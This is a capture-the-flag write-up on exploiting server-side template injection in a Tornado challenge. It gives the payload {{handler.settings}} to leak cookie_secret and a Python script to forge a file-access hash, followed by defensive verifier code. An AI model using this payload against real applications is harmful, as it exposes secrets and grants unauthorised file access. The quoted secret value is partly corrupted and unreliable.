Vulnerability reproduction: easy_tornado
2022-07-07 08:10:00 【_ s1mple】
[Environment]
Windows
[Tools]
Firefox
[Steps]
Tornado is a web application framework for Python.
Opening the challenge shows three files:
flag.txt
/flag.txt
flag in /fllllllllllllag
So the flag is in the file /fllllllllllllag.
welcome.txt
/welcome.txt
render
render is a rendering function in Python: it renders variables into a template, so different pages can be produced by passing different parameters.
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))
filehash=md5(cookie_secret+md5(filename)). Here filename=/fllllllllllllag, so knowing cookie_secret is all that is needed to access the flag.
Further testing turned up an error page of the form /error?msg=Error, which suggests server-side template injection (SSTI).
Try /error?msg={{datetime}}. In a Tornado template, datetime refers to Python's datetime module. Tornado provides some object aliases for quick access to objects; see the official Tornado documentation.
The documentation shows that cookie_secret is stored in the settings attribute of the Application object, and that self.application.settings has an alias:
RequestHandler.settings
An alias for self.application.settings.
handler is the RequestHandler object that handles the current page, and RequestHandler.settings points to self.application.settings, so handler.settings points to RequestHandler.application.settings.
Construct a payload to obtain cookie_secret:
/error?msg={{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
Calculate the filehash value:
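import hashlib

def md5(s):
    # hashlib works on bytes, so encode the string first (required on Python 3)
    return hashlib.md5(s.encode()).hexdigest()

def filehash():
    filename = '/fllllllllllllag'
    # cookie_secret as returned by {{handler.settings}}
    cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
    # filehash = md5(cookie_secret + md5(filename)), as given in hints.txt
    print(md5(cookie_secret + md5(filename)))

if __name__ == '__main__':
    filehash()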
payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))
The flag is obtained successfully.
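From the defender's side, the filehash check described in hints.txt can be written as a server-side verifier, shown here next to an HMAC-SHA256 variant with constant-time comparison. This is an added example, not the challenge's source code: the function names, the HMAC variant and the sample secret are assumptions made for illustration.

```python
import hashlib
import hmac

# Constructed sample secret for this example (not the challenge's cookie_secret).
SECRET = b"constructed-sample-secret"


def filehash_md5(secret: bytes, filename: str) -> str:
    """Scheme from hints.txt: md5(cookie_secret + md5(filename))."""
    inner = hashlib.md5(filename.encode()).hexdigest()
    return hashlib.md5(secret + inner.encode()).hexdigest()


def filehash_hmac(secret: bytes, filename: str) -> str:
    """Hardened variant (an assumption of this example): HMAC-SHA256."""
    return hmac.new(secret, filename.encode(), hashlib.sha256).hexdigest()


def verify(secret: bytes, filename: str, supplied: str, scheme=filehash_hmac) -> bool:
    """Recompute the tag server-side and compare it in constant time."""
    expected = scheme(secret, filename)
    # Compare as bytes: compare_digest() raises TypeError on non-ASCII str input.
    return hmac.compare_digest(expected.encode(), supplied.encode())


def demo() -> dict:
    tag = filehash_hmac(SECRET, "/welcome.txt")
    return {
        # A tag issued for one file is accepted for that file only.
        "own_file": verify(SECRET, "/welcome.txt", tag),
        "other_file": verify(SECRET, "/fllllllllllllag", tag),
        # Anyone who has read the secret can mint a valid tag for any path,
        # under either scheme: the key must never reach a template namespace.
        "leaked_md5": verify(SECRET, "/fllllllllllllag",
                             filehash_md5(SECRET, "/fllllllllllllag"), filehash_md5),
        "leaked_hmac": verify(SECRET, "/fllllllllllllag",
                              filehash_hmac(SECRET, "/fllllllllllllag")),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

Switching to HMAC does not help once the secret is readable, so the fix that matters is passing msg to the template as a variable instead of rendering it as template source.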